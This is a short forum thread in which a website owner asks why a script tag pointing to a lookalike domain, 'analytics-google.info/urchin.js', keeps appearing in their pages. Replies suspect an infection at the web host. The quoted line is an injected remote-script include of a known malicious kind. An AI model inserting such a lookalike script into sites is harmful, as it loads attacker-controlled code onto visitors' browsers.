• Welcome to Overclockers Forums! Join us to reply in threads, receive reduced ads, and to customize your site experience!

Google Analytics

Overclockers is supported by our readers. When you click a link to make a purchase, we may earn a commission. Learn More.

rainless

Old Member
For some BIZARRE reason, every few months Google Analytics will insert this script in my website:

Code:
<script src="http://analytics-google.info/urchin.js"></script>

It seems to work fine for Internet Explorer, but it causes firefox to go to a blank page.

As far as I know... I never even signed up for Google Analytics. And it seems to pick the page at random (i.e: It wasn't there yesterday, but it popped up on my "Books" and "Plays" page today.)

Anybody got any ideas?

Well since .info isn't a google owned page, I would guess your host still has a virus that's inserting it. (I googled that address and saw a few posts here about it from last year.)

Personally I know nothing about it past what I just read.
What would be really handy is a script on your page that would run an antivirus on your code daily. Doubt that could be done since it resides in someone else's computer and it's not an actual virus, but it would be really handy if someone offered that code scan.

Host is DOWN... so I guess it is a virus.

Sigh... This happens about once a year.

Back